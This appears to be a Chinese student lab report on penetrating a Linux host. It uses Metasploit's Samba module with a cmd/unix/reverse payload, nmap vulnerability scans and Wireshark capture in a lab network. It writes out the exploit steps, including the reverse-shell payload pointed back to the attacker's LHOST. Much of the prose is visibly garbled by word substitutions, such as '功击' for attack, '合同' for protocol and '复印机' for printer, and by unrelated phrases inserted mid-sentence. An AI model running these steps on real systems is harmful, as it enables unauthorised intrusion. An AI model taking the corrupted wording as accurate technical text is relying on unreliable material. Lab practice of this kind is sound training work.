目录

一.知识点梳理与总结

1.目前,Linux已然成为服务器操作最流行的选择,虽然Linux在安全设计上较Windows等一些操作系统具有一定的先天优势linux操作系统培训,但它也决不是原先一些人所觉得的“绝对安全”。Linux操作系统也存在着大量的安全漏洞,因为它的开源特点,黑客们反倒更容易从源码中发觉更多的Linux系统内核及开源软件中的漏洞,系统管理员对Linux服务器的忙于管理也促使近些年来针对Linux系统的安全风波多有发生。

本次实践针对Linux系统存在漏洞进行远程渗透功击,使用的工具为Metasploit,据悉在进行攻守对抗过程中,还使用到了Nmap、Neusse等信息收集工具。

2.SMB(ServerMessageBlock)合同是实现不同类型计算机之间文件和复印机共享服务的合同。

SMB的工作原理就是让NetBIOS合同与SMB合同运行在TCP/IP合同之上,而且借助NetBIOS的名子解析功能让Linux计算机可以在Windows计算机之间互相访问共享文件和复印机的功能。

3.Samba是一组使linux支持SMB合同的软件,基于GPL原则发行linux内核中网络协议的设计与实现,源码完全公开。Samba的核心是两个守护进程smbd和nmbd.smbd守护进程负责构建对话linux内核中网络协议的设计与实现,验证用户提供文件和复印机共享服务等。nmbd守护进程负责实现网路浏览。

1.SMB合同2.Samba二.实验过程1.使用Metasploit进行Linux远程渗透功击

本次实验使用的功击机为Kali,IP地址为192.168.200.8;机炮为MetasploitUbuntu,IP地址为192.168.200.124:

首先在Kali上打开Metasploit:

查找要使用的漏洞对应的模块

searchsamba

对应编号是13,为此,use13即可使用该模块。

查看可用荷载showpayloads

选择功击荷载setpayloadcmd/unix/reverse

查看须要配置的参数showoptions

配置相应的参数

setRHOST192.168.200.124,setLHOST192.168.200.8

只需配置机炮IP即可

设置完成后,输入exploit进行功击

可以看见早已功击成功

2.攻守对抗实践

二人联接到同一个局域网中,功击机kali和火箭炮metasploit的IP地址分别为192.168.200.8和192.168.200.124

测试下它们的连通性

ping192.168.200.124

ping通以后

使用nmap-sV192.168.200.124扫描目标主机的开放端口与版本号等信息:

使用nmap--scriptvuln192.168.200.124扫描目标主机存在的漏洞:

功击采用的渗透模块依然是第一个实验中使用的模块,输入searchsamba

use13

此次选择第五个payloads

可以看见功击成功

逼抢方窃听:对第二次的功击进行逼抢

借助wireshark对网卡进行窃听,从中可以剖析得到,功击者IP为192.168.200.8,功击者借助的是139端口进行功击,在功击成功后进行了ifconfig等操作

三.学习中遇见的问题

问题1.在看wireshark数据包时,不晓得如何剖析出功击者是借助那个端口(服务)的漏洞进行功击的

解决:经过寻问朋友linux系统,得知从抓取数据包找最前面一个包的端口信息,对端口的理解也更深

四.学习体会

在实验中会碰到一些不理解的步骤,解决后会认为受益颇丰。从之前理解不是很到位的端口和网关,每一次亲自试错解决就会觉得收获很大。

通过本次使用Metasploit进行Linux远程渗透功击,首先进一步熟悉了Metasploit工具的使用,其次通过攻守对抗过程,动手进行了从漏洞信息收集、漏洞借助、渗透功击到获取目标主机权限的过程,提升了自己的实践能力。

本文原创地址://lrxjmw.cn/kyyylxtnhjky.html编辑:刘遄,审核员:暂无